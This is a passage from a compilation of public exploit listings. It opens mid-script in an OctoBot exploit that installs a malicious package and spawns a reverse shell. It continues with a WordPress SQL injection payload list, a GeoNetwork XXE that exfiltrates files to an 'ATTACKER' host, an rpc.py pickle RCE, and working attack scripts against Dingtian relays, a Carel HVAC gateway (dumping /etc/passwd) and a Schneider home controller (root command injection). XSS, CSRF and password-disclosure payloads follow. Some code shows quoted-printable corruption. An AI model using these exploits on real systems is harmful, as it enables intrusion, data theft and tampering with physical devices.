  verify=False disables TLS certificate verification for every https
  request made through this helper, so the operator's own traffic is
  exposed to interception; the timeout is 60 s.
  """
  response = requests.get(url, allow_redirects=False, verify=False, timeout=60)
  return response


def injectBackdoor(RHOST, RPORT, zipLink):
  """Ask the OctoBot web interface to register and install the package at `zipLink`.

  POSTs {"<zipLink>": "register_and_install"} to
  /advanced/tentacle_packages?update_type=add_package. The JSON body is
  built by string concatenation, so a zipLink containing '"' would break
  it (json.dumps would be the safe form). The reply, with quotes stripped,
  is compared against 'Tentacles installed'; anything else exits the
  script. any_platform.zip is deleted before that check regardless of
  outcome, and the POST has no timeout (unlike curl()).

  For defenders: an add_package request carrying an off-site URL is the
  event to alert on — tentacle installs should only come from the vendor's
  package source.
  """
  print('[+] \033[1;92mInjecting Sashimi malicious Tentacle packages in Ocotobot... May take a minute.\033[1;m')
  if RPORT == 443:
    url = 'https://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT)
  else:
    url = 'http://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT) 

  headers = {
    'Content-Type': 'application/json',
    'X-Requested-With': 'XMLHttpRequest',
  }
  
  data = '{"'+zipLink+'":"register_and_install"}'

  response = requests.post(url, headers=headers, data=data)
  response = response.content.decode('utf-8').replace('"', '').strip()
  
  os.remove('any_platform.zip')
  
  if response != 'Tentacles installed':
    print('[!] \033[1;91mError: Something went wrong while trying to install the malicious Tentacle package.\033[1;m')
    exit()
  print('[+] \033[1;92mSashimi malicious Tentacle package has been successfully installed on the OctoBot target.\033[1;m')


def execReverseShell(RHOST, RPORT, LHOST, LPORT):
  """Trigger the route added by injectMetadataFile() by GETting /api/sashimi with LHOST/LPORT.

  Returns the curl() Response. The handler on the target presumably
  blocks in pty.spawn, so curl()'s 60 s timeout is what ends this call.
  """
  print('[+] \033[1;92mExecuting reverse shell on {}:{}.\033[1;m'.format(LHOST, LPORT))
  if RPORT == 443:
    url = 'https://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT)
  else:
    url = 'http://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT)
  return curl(url) 

def isPassword(RHOST, RPORT):
  """GET the target's root URL through curl() and return the Response.

  Despite the name this does not return a bool; main() inspects
  .status_code (non-200 is taken to mean the web UI is password protected).
  """
  scheme = 'https' if RPORT == 443 else 'http'
  root_url = '{}://{}:{}'.format(scheme, RHOST, RPORT)
  return curl(root_url)
  
def main():
  """Run the full chain: fingerprint, build, publish, install and trigger the package.

  Uses the module-level `parser` created in the __main__ block. The
  password check only prints — a non-200 root page does not stop the run.
  `octobotVersion` is the raw /api/version body with quotes and the
  'OctoBot ' prefix removed and is then used unsanitised as a URL component
  and as a local file name (downloadTentaclePackage()). An empty version
  merely skips the "detected" message.
  """
  banner()
  args = parser.parse_args()

  if isPassword(args.RHOST, args.RPORT).status_code != 200:
    print('[!] \033[1;91mError: This Octobot Platform seems to be protected with a password!\033[1;m')

  octobotVersion = getOctobotVersion(args.RHOST, args.RPORT).content.decode('utf-8').replace('"','').replace('OctoBot ','')

  if len(octobotVersion) > 0:
    print('[+] \033[1;92mPlatform OctoBot {} detected.\033[1;m'.format(octobotVersion))

  downloadTentaclePackage(octobotVersion)
  unzipTentaclePackage(octobotVersion)
  craftBackdoor(octobotVersion)
  rePackTentaclePackage()
  zipLink = uploadMaliciousTentacle()
  injectBackdoor(args.RHOST, args.RPORT, zipLink)
  restartOctobot(args.RHOST, args.RPORT)
  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)


if __name__ == "__main__":
  # `parser` is a module global read by main(); it exists only when run as a script.
  parser = argparse.ArgumentParser(description='POC script that exploits the Tentacles upload functionalities on OctoBot. A vulnerability has been found and can execute a reverse shell by crafting a malicious packet. Version affected from 0.4.0b3 to 0.4.0b10 so far.', add_help=False)
  # BUG(review): help() is *called* here rather than passed, so the usage text
  # is printed on every start and -h/--help is registered with help=None as a
  # plain store option that expects a value.
  parser.add_argument('-h', '--help', help=help())
  parser.add_argument('--RHOST', help="Refers to the IP of the target machine.", type=str, required=True)
  parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)
  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
  main()
            
# Title: WordPress Plugin Visual Slide Box Builder 3.2.9 - SQLi
# Author: nu11secur1ty
# Date: 07.11.2022
# Vendor: https://wphive.com/
# Software: https://wphive.com/plugins/wp-visual-slidebox-builder/?plugin_version=3.2.9
# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin

## Description:
The `idx` parameter of the Visual Slide Box Builder plugin for WordPress
(`action=vsbb_get_one`) appears to be vulnerable to SQL injection.
An attacker can read the entire WordPress database through it and misuse
its contents.

[+] Payloads:

```mysql
---
Parameter: idx (GET)
    Type: boolean-based blind
    Title: HAVING boolean-based blind - WHERE, GROUP BY clause
    Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)
HAVING 1854=1854

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)
AND (SELECT 3837 FROM (SELECT(SLEEP(7)))QHbL)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: action=vsbb_get_one&idx=-5038 UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x716a626a71,0x4e6b417358754d527a4a69544c57654a53574a64736b5a656e4b7968767a7a4d454243797a796d72,0x717a7a7a71),NULL,NULL#
---
```
            
# Exploit Title: Geonetwork 4.2.0 - XML External Entity (XXE)
# Date: 2022-July-11
# Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb)
# Vendor Homepage: https://geonetwork-opensource.org/
# Version: Geonetwork 3.10.X through 4.2.0
# Tested on: Microsoft Windows Server & Linux

# Description:
# GeoNetwork 3.1.x through 4.2.0
# Triggered while rendering a map to PDF.
# The XML parser is not configured securely when validating XML documents accepted from an untrusted source, which might result in arbitrary file retrieval from the server.

====================PDF RENDERING==================== 

POST /geonetwork/pdf/create.json HTTP/1.1
Host: REDACTED
Content-Type: application/json
Connection: close
Content-Length: 563

{"layout":"landscape","srs":"","units":"m","rotation":0,"lang":"fre","dpi":"190","outputFormat":"pdf","layers":[{"opacity":1,"type":"mapServer","baseURL":"http://attacker/xxe.xml","layers":["Tracts",],

"format":"image/svg+xml","name":"xxe","extent":[-20037508.34,-20037508.34,20037508.34,

20037508.34],

"tileSize":[256,256]}],"enableLegends":true,"hasTitle":true,"hasNoTitle":false,"hasAttribution":false,"pages":[{"center":[172063.3620639667,4200083.030736061],"scale":"2.5E7","dataOwner":"© ","rotation":0,"comment":"ok","title":"ok","langfre":true}]}


The `baseURL` parameter must point to your XML file (xxe.xml below):

====================XXE_ATTACK==================== 

====================XXE.XML=======================

<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://ATTACKER/x.dtd"> %pe; %param1; ]>
<foo>&external;</foo>

====================X.dtd=========================
xxe.xml then fetches x.dtd, which defines the entities:

<!ENTITY % stuff SYSTEM "file:///etc/hostname">
<!ENTITY % param1 "<!ENTITY external SYSTEM 'ftp://ATTACKER_FTP/%stuff;'>">
            
# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 2022-07-12
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/abersheeran
# Software Link: https://github.com/abersheeran/rpc.py
# Version: v0.4.2 - v0.6.0
# Tested on: Debian 11, Ubuntu 20.04
# CVE : CVE-2022-35411

import requests
import pickle

# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py

# NOTE(review): every "=3D" in this listing is quoted-printable residue for
# "=" (the file was mangled in transit); as shown it does not parse.
HOST =3D "127.0.0.1:65432"

# rpc.py server endpoint the PoC posts to (loopback here: a local test setup).
URL =3D f"http://{HOST}/sayhi"

# The "serializer" request header tells the server which deserializer to
# apply to the body; "pickle" presumably makes it unpickle attacker-supplied
# bytes, which is the root cause being demonstrated. The fix is server side:
# never accept pickle (or any code-executing serializer) from
# unauthenticated clients.
HEADERS =3D {
    "serializer": "pickle"
}


def generate_payload(cmd):
    """Serialize an object whose unpickling calls os.system(cmd), and return the bytes.

    PickleRce.__reduce__ returns (os.system, (cmd,)), which is exactly why
    pickle must never be applied to untrusted input: pickle.loads() on the
    result executes `cmd` on the loading side. The raw payload is printed
    before being returned.

    Args:
        cmd: shell command string to embed.

    Returns:
        bytes produced by pickle.dumps().
    """

    class PickleRce(object):
        def __reduce__(self):
            import os
            return os.system, (cmd,)

    payload =3D pickle.dumps(PickleRce())

    print(payload)

    return payload


def exec_command(cmd):
    """POST the pickle for `cmd` to URL with the pickle serializer header.

    The response is discarded and no timeout is set; whether anything ran
    can only be observed out of band (see main()).
    """

    payload =3D generate_payload(cmd)

    requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS)


def main():
    """PoC entry point.

    The embedded command only makes an HTTP request to a loopback address,
    so execution is confirmed by whatever listens on 127.0.0.1:4321; both
    addresses in this listing are local, i.e. a self-contained test setup.
    """
    exec_command('curl http://127.0.0.1:4321')
    # exec_command('uname -a')


if __name__ =3D=3D "__main__":  # "=3D=3D" is quoted-printable residue for "=="
    main()
            
# Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path
# Date: 07/14/2022
# Exploit Author: Angelo Pio Amirante
# Version: 1.0.0.4
# Tested on: Windows 10
# Patched version: 1.0.5.0
# CVE: CVE-2022-35899

# Step to discover the unquoted service path:

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# Info on the service:

C:\>sc qc "GameSDK Service"
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: GameSDK Service
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : GameSDK Service
        DIPENDENZE                :
        SERVICE_START_NAME : LocalSystem

# Exploit
If an attacker has already compromised the system and the current user has privileges to write to "C:\" or to the "C:\Program Files (x86)\ASUS\" folder, they could place their own "Program.exe" or "GameSDK.exe" file respectively, and when the service starts it would launch the malicious file rather than the original "GameSDK.exe".
            
# Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass
# Google Dork: NA
# Date: 13th July 2022
# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
# Author Github Page: https://9lyph.github.io/CVE-2022-29593/
# Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html
# Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download
# Version: V3.1.276A
# Tested on: MAC OSX
# CVE : CVE-2022-29593
#!/usr/local/bin/python3
# Author: Victor Hanna (SpiderLabs)
# DingTian DT-R002 2CH Smart Relay
# CWE-294 - Authentication Bypass by Capture-replay

import requests
import re
import urllib.parse
from colorama import init
from colorama import Fore, Back, Style
import sys
import os
import time

from urllib3.exceptions import InsecureRequestWarning
# Silence urllib3's InsecureRequestWarning. Every request in this script goes
# to a plain "http://" URL, so no TLS verification is involved and this
# suppression has no effect on the traffic the script generates.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def banner():
    """Print the tool's header box (author, description, usage) to stdout.

    The usage line embeds ``sys.argv[0]``; the author tag is wrapped in
    colorama's ``Fore.RED`` / ``Style.RESET_ALL``. Every string is printed
    verbatim, padding included.
    """
    border = "[+]********************************************************************************[+]"
    author_tag = Fore.RED + "SpiderLabs" + Style.RESET_ALL
    rows = (
        border,
        "|   Author : Victor Hanna (9lyph)[" + author_tag + "]\t\t\t\t\t    |",
        "|   Description: DingTian DT-R002 2CH Smart Relay                                      |",
        "|   Usage : " + sys.argv[0] + " <host> <relay#>                                           |",
        border,
    )
    for row in rows:
        print(row)

def main():
    """Switch the chosen relay on, wait five seconds, then switch it off again.

    Reads the module-level ``host`` and ``relay`` assigned in ``__main__``.
    ``relay`` must be the string "1" or "2"; any other value prints
    "No such relay". All requests go to the device's relay_cgi.cgi over plain
    http with a literal ``pwd=0`` query parameter and no other credential.
    """
    os.system('clear')  # shells out to clear the screen; fails harmlessly where `clear` is absent
    banner()
    # relay=0 is "Relay 1", relay=1 is "Relay 2"; on=1 / on=0 select the action.
    urlRelay1On  = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0&"
    urlRelay1Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0&"
    urlRelay2On  = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=1&time=0&pwd=0&"
    urlRelay2Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=0&time=0&pwd=0&"

    # NOTE(review): this header set (including the fixed "session" cookie) is
    # built but never passed to requests.get() below, so every request is sent
    # with requests' default headers and no cookie at all.
    headers = {
        "Host": ""+host+"",
        "User-Agent": "9lyph/3.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "DNT": "1",
        "Connection": "close",
        "Referer": "http://"+host+"/relay_cgi.html",
        "Cookie": "session=4463009"
    }

    print (Fore.YELLOW + f"[+] Exploiting" + Style.RESET_ALL, flush=True, end=" ")
    for i in range(5):  # purely cosmetic five-second countdown
        time.sleep (1)
        print (Fore.YELLOW + "." + Style.RESET_ALL, flush=True, end="")
    try:
        # `r` is assigned but never inspected: neither status code nor body is
        # checked, so "PWNED" is printed regardless of what the device answered.
        # No timeout= is passed to requests.get(), so the Timeout handler below
        # is unlikely to ever fire.
        if (relay == "1"):
            print (Fore.GREEN + "\n[+] Relay 1 switched on !" + Style.RESET_ALL)
            r = requests.get(urlRelay1On)
            time.sleep (5)
            print (Fore.GREEN + "[+] Relay 1 switched off !" + Style.RESET_ALL)
            r = requests.get(urlRelay1Off)
            print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")
        elif (relay == "2"):
            print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)
            r = requests.get(urlRelay2On)
            time.sleep (5)
            # The message below says "switched on" although this is the off request.
            print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)
            r = requests.get(urlRelay2Off)
            print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")
        else:
            print (Fore.RED + "[!] No such relay" + Style.RESET_ALL)
    except KeyboardInterrupt:
        sys.exit(1)
    except requests.exceptions.Timeout:
        print ("[!] Connection to host timed out !")
        sys.exit(1)
    # Unreachable: the same exception type is already caught by the clause above.
    except requests.exceptions.Timeout:
        print ("[!] Connection to host timed out !")
        sys.exit(1)
    except Exception as e:
        # Any other failure (DNS, refused connection, ...) is reported with a
        # generic message; `e` itself is never shown.
        print (Fore.RED + f"[+] You came up short I\'m afraid !" + Style.RESET_ALL)

if __name__ == "__main__":
    # Module-level `host` and `relay` are read by main(). Both are taken
    # verbatim from the command line with no validation; main() compares
    # `relay` against the strings "1" and "2".
    if len(sys.argv)>2:    
        host = sys.argv[1]
        relay = sys.argv[2]
        main ()
    else:
        print (Fore.RED + f"[+] Not enough arguments, please specify target and relay!" + Style.RESET_ALL)
            
# Exploit Title: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Directory Traversal
# Exploit Author: LiquidWorm


Vendor: CAREL INDUSTRIES S.p.A.
Product web page: https://www.carel.com
Affected version: Firmware: A2.1.0 - B2.1.0
                  Application Software: 2.15.4A
                  Software version: v16 13020200

Summary: pCO sistema is the solution CAREL offers its customers for managing HVAC/R
applications and systems. It consists of programmable controllers, user interfaces,
gateways and communication interfaces, remote management systems to offer the OEMs
working in HVAC/R a control system that is powerful yet flexible, can be easily interfaced
to the more widely-used Building Management Systems, and can also be integrated into
proprietary supervisory systems.

Desc: The device suffers from an unauthenticated arbitrary file disclosure vulnerability.
Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script
is not properly verified before being used to download log files. This can be exploited
to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

=======================================================================================
/usr/local/www/usr-cgi/logdownload.cgi:
---------------------------------------

01: #!/bin/bash
02:
03: if [ "$REQUEST_METHOD" = "POST" ]; then
04:         read QUERY_STRING
05:         REQUEST_METHOD=GET
06:         export REQUEST_METHOD
07:         export QUERY_STRING
08: fi
09:
10: LOGDIR="/usr/local/root/flash/http/log"
11:
12: tmp=${QUERY_STRING%"$"*}
13: cmd=${tmp%"="*}
14: if [ "$cmd" = "dir" ]; then
15:         PATHCURRENT=$LOGDIR/${tmp#*"="}
16: else
17:         PATHCURRENT=$LOGDIR
18: fi
19:
20: tmp=${QUERY_STRING#*"$"}
21: cmd=${tmp%"="*}
22: if [ "$cmd" = "file" ]; then
23:         FILECURRENT=${tmp#*"="}
24: else
25:         if [ -f $PATHCURRENT/lastlog.csv.gz ]; then
26:                 FILECURRENT=lastlog.csv.gz
27:         else
28:                 FILECURRENT=lastlog.csv
29:         fi
30: fi
31:
32: if [ ! -f $PATHCURRENT/$FILECURRENT ]; then
33:         echo -ne "Content-type: text/html\r\nCache-Control: no-cache\r\nExpires: -1\r\n\r\n"
34:         cat carel.inc.html
35:         echo "<center>File not available!</center>"
36:         cat carel.bottom.html
37:         exit
38: fi
39:
40: if [ -z $(echo $FILECURRENT | grep -i gz ) ]; then
41:         if [ -z $(echo $FILECURRENT | grep -i bmp ) ]; then
42:                 if [ -z $(echo $FILECURRENT | grep -i svg ) ]; then
43:                         echo -ne "Content-Type: text/csv\r\n"
44:                 else
45:                         echo -ne "Content-Type: image/svg+xml\r\n"
46:                 fi
47:         else
48:                 echo -ne "Content-Type: image/bmp\r\n"
49:         fi
50: else
51:         echo -ne "Content-Type: application/x-gzip\r\n"
52: fi
53: echo -ne "Content-Disposition: attachment; filename=$FILECURRENT\r\n\r\n"
54:
55: cat $PATHCURRENT/$FILECURRENT

=======================================================================================

Tested on: GNU/Linux 4.11.12 (armv7l)
           thttpd/2.29


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5709
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5709.php


10.05.2022

--


$ curl -s http://10.0.0.3/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:65534:65534:nobody:/home:/bin/false
guest:x:502:101::/home/guest:/bin/bash
carel:x:500:500:Carel:/home/carel:/bin/bash
http:x:48:48:HTTP users:/usr/local/www/http:/bin/false
httpadmin:x:200:200:httpadmin:/usr/local/www/http:/bin/bash
sshd:x:1000:1001:SSH drop priv user:/:/bin/false
            
# Exploit Title: Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution
# Exploit Author: LiquidWorm

<#SpaceLogic.ps1

Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit


Vendor: Schneider Electric SE
Product web page: https://www.se.com
                  https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/
                  https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmware
Affected version: SpaceLogic C-Bus Home Controller (5200WHC2)
                  formerly known as C-Bus Wiser Home Controller MK2
                  V1.31.460 and prior
                  Firmware: 604

Summary: SpaceLogic C-Bus Home Automation System
Lighting control and automation solutions for
buildings of the future, part of SpaceLogic.
SpaceLogic C-Bus is a powerful, fully integrated
system that can control and automate lighting
and many other electrical systems and products.
The SpaceLogic C-Bus system is robust, flexible,
scalable and has proven solutions for buildings
of the future. Implemented for commercial and
residential buildings automation, it brings
control, comfort, efficiency and ease of use
to its occupants.

Wiser Home Control makes technologies in your
home easy by providing seamless control of music,
home theatre, lighting, air conditioning, sprinkler
systems, curtains and shutters, security systems...
you name it. Usable anytime, anywhere even when
you are away, via preset shortcuts or direct
control, in the same look and feel from a wall
switch, a home computer, or even your smartphone
or TV - there is no wiser way to enjoy 24/7
connectivity, comfort and convenience, entertainment
and peace of mind homewide! 

The Wiser 2 Home Controller allows you to access
your C-Bus using a graphical user interface, sometimes
referred to as the Wiser 2 UI. The Wiser 2 Home
Controller arrives with a sample project loaded
and the user interface accessible from your local
home network. With certain options set, you can
also access the Wiser 2 UI from anywhere using
the Internet. Using the Wiser 2 Home Controller
you can: control equipment such as IP cameras,
C-Bus devices and non C-Bus wired and wireless
equipment on the home LAN, schedule events in
the home, create and store scenes on-board, customise
a C-Bus system using the on-board Logic Engine,
monitor the home environment including C-Bus and
security systems, control ZigBee products such
as Ulti-ZigBee Dimmer, Relay, Groups and Curtains.

Examples of equipment you might access with Wiser
2 Home Controller include lighting, HVAC, curtains,
cameras, sprinkler systems, power monitoring, Ulti-ZigBee,
multi-room audio and security controls.

Desc: The home automation solution suffers from
an authenticated OS command injection vulnerability.
This can be exploited to inject and execute arbitrary
shell commands as the root user via the 'name' GET
parameter in 'delsnap.pl' Perl/CGI script which is
used for deleting snapshots taken from the webcam.

=========================================================
/www/delsnap.pl:
----------------

01: #!/usr/bin/perl
02: use IO::Handle;
03:
04:
05: select(STDERR);
06: $| = 1;
07: select(STDOUT);
08: $| = 1;
09:
10: #print "\r\n\r\n";
11:
12: $CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/';
13: use CGI;
14:
15: my $PROGNAME = "delsnap.pl";
16:
17: my $cgi = new CGI();
18:
19: my $name = $cgi->param('name');
20: if ($name eq "list") {
21:     print "\r\n\r\n";
22:     print "DATA=";
23:     print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`;
24:     exit(0);
25: }
26: if ($name eq "deleteall") {
27:     print "\r\n\r\n";
28:     print "DELETINGALL=TRUE&";
29:     print `rm /mnt/microsd/clipsal/ugen/imgs/*`;
30:     print "COMPLETED=true\n";
31:     exit(0);
32: }
33: #print "name $name\n";
34: print "\r\n\r\n";
35: my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name";
36:
37: unlink $filename or die "COMPLETED=false\n";
38:
39: print "COMPLETED=true\n";

=========================================================

Tested on: Machine: OMAP3 Wiser2 Board
           CPU: ARMv7 revision 2
           GNU/Linux 2.6.37 (armv7l)
           BusyBox v1.22.1
           thttpd/2.25b
           Perl v5.20.0
           Clipsal 81
           Angstrom 2009.X-stable
           PICED 4.14.0.100
           lighttpd/1.7
           GCC 4.4.3
           NodeJS v10.15.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5710
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.php

Vendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf

CVE ID: CVE-2022-34753
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34753


27.03.2022

#>


# Console colour for all following Write-Host output ($host is PowerShell's
# automatic host variable, unrelated to the target address).
$host.UI.RawUI.ForegroundColor = "Green"
if ($($args.Count) -ne 2)  {
    Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n")
} else {
    $ip = $args[0]
    $cmd = $args[1]
    # The command is appended unencoded after "name=|"; no URL encoding is
    # applied, so spaces and ';' travel verbatim (see the PoC transcript below).
    $cmdinj = "/delsnap.pl?name=|$cmd"
    Write-Host("`nSending command '$cmd' to $ip`n")
    # A Basic-auth variant was left commented out; the request actually sent
    # carries no Authorization header.
    #curl -Headers @{Authorization = "Basic XXXX"} -v $ip$cmdinj
    # In Windows PowerShell `curl` is an alias for Invoke-WebRequest — the
    # "VERBOSE: GET ... with 0-byte payload" lines in the PoC are its output.
    curl -v $ip$cmdinj
}


<#PoC

PS C:\> .\SpaceLogic.ps1

Usage: .\SpaceLogic.ps1 [IP] [CMD]


PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd"

Sending command 'uname -a;id;pwd' to 192.168.1.2

VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payload
VERBOSE: received 129-byte response of content type text/html; charset=utf-8


StatusCode        : 200
StatusDescription : OK
Content           : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux
                    uid=0(root) gid=0(root)
                    /custom-package
                    
RawContent        : HTTP/1.1 200 OK
                    Access-Control-Allow-Origin: *
                    Connection: keep-alive
                    Content-Length: 129
                    Content-Type: text/html; charset=utf-8
                    Date: Thu, 30 Jun 2022 14:48:43 GMT
                    ETag: W/"81-LTIWJvYlDBYAlgXEy...
Forms             : {}
Headers           : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html; 
                    charset=utf-8]...}
Images            : {}
InputFields       : {}
Links             : {}
ParsedHtml        : mshtml.HTMLDocumentClass
RawContentLength  : 129




PS C:\>
#>
            
# Exploit Title: WordPress Plugin WP-UserOnline 2.87.6 - Stored Cross-Site Scripting (XSS)
# Date: 21/07/2022
# Exploit Author: Steffin Stanly
# Vendor Homepage: https://github.com/lesterchan/wp-useronline
# Software Link: https://wordpress.org/plugins/wp-useronline/
# Version: <=2.87.6
# Tested on Windows

How to reproduce vulnerability:

1. Install WordPress 6.0.1
2. Install and activate WP-UserOnline plugin.
3. Navigate to Setting >> WP-UserOnline and enter the data into the User(s) Browsing Site.
4. Add the following payload "><script>alert(1)</script> and save changes
5. On visiting the dashboard, you will observe that the payload has been stored in the database; when the same functionality is triggered, the JavaScript payload executes and a pop-up appears.
            
# Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS)
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M33A8.V5030.190716
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34048
# Tested on: Windows

# Poc code
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <!--
    Review note: a plain cross-origin form POST to /cgi-bin/login.cgi.
    The "login_page" value, once its entities are decoded, is
      x");alert(9);x=("
    i.e. a string that closes a quoted JavaScript argument and injects
    alert(9). As written, however, the attribute is malformed: the unescaped
    quote right after x terminates the value early, so a browser will likely
    submit just "x" and treat the remainder as stray attributes. "ipaddr" and
    "hostname" carry the addresses captured when the form was generated;
    "password" is a 32-hex-character value copied from the captured request
    (its derivation is not shown here). The form needs no token, so the
    endpoint presumably accepts cross-site submissions; a per-session CSRF
    token plus output encoding of these parameters would address both issues.
  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST">
      <input type="hidden" name="newUI" value="1" />
      <input type="hidden" name="page" value="login" />
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="langChange" value="0" />
     <input type="hidden" name="ipaddr" value="196&#46;219&#46;234&#46;10" />
      <input type="hidden" name="login&#95;page" value="x"&#41;&#59;alert&#40;9&#41;&#59;x&#61;&#40;"" />
      <input type="hidden" name="homepage" value="main&#46;shtml" />
      <input type="hidden" name="sysinitpage" value="sysinit&#46;shtml" />
      <input type="hidden" name="wizardpage" value="wiz&#46;shtml" />
      <input type="hidden" name="hostname" value="59&#46;148&#46;80&#46;138" />
      <input type="hidden" name="key" value="M94947765" />
      <input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" />
      <input type="hidden" name="lang&#95;select" value="en" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
            
# Exploit Title: Wavlink WN533A8 - Password Disclosure
# Date: 2022-06-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M33A8.V5030.190716
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34046
# Tested on: Windows

# Exploit

view-source:http://IP_ADDRESS/sysinit.shtml
search for var syspasswd="
you will find the username and the password
            
# Exploit Title: WordPress Plugin Duplicator 1.4.7 - Information Disclosure
# Google Dork: N/A
# Date: 07.27.2022
# Exploit Author: SecuriTrust
# Vendor Homepage: https://snapcreek.com/
# Software Link: https://wordpress.org/plugins/duplicator/
# Version: <= 1.4.7
# Tested on: Linux, Windows
# CVE : CVE-2022-2552
# Reference: https://securitrust.fr
# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2552

#Product:
WordPress Plugin Duplicator <= 1.4.7

#Vulnerability:
1-Some system information may be disclosed.

#Proof-Of-Concept:
1-System information.
Some system information is obtained using the "view" parameter.
http://[PATH]/backups-dup-lite/dup-installer/main.installer.php
            
# Exploit Title: WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download
# Google Dork: N/A
# Date: 07.27.2022
# Exploit Author: SecuriTrust
# Vendor Homepage: https://snapcreek.com/
# Software Link: https://wordpress.org/plugins/duplicator/
# Version: < 1.4.7
# Tested on: Linux, Windows
# CVE : CVE-2022-2551
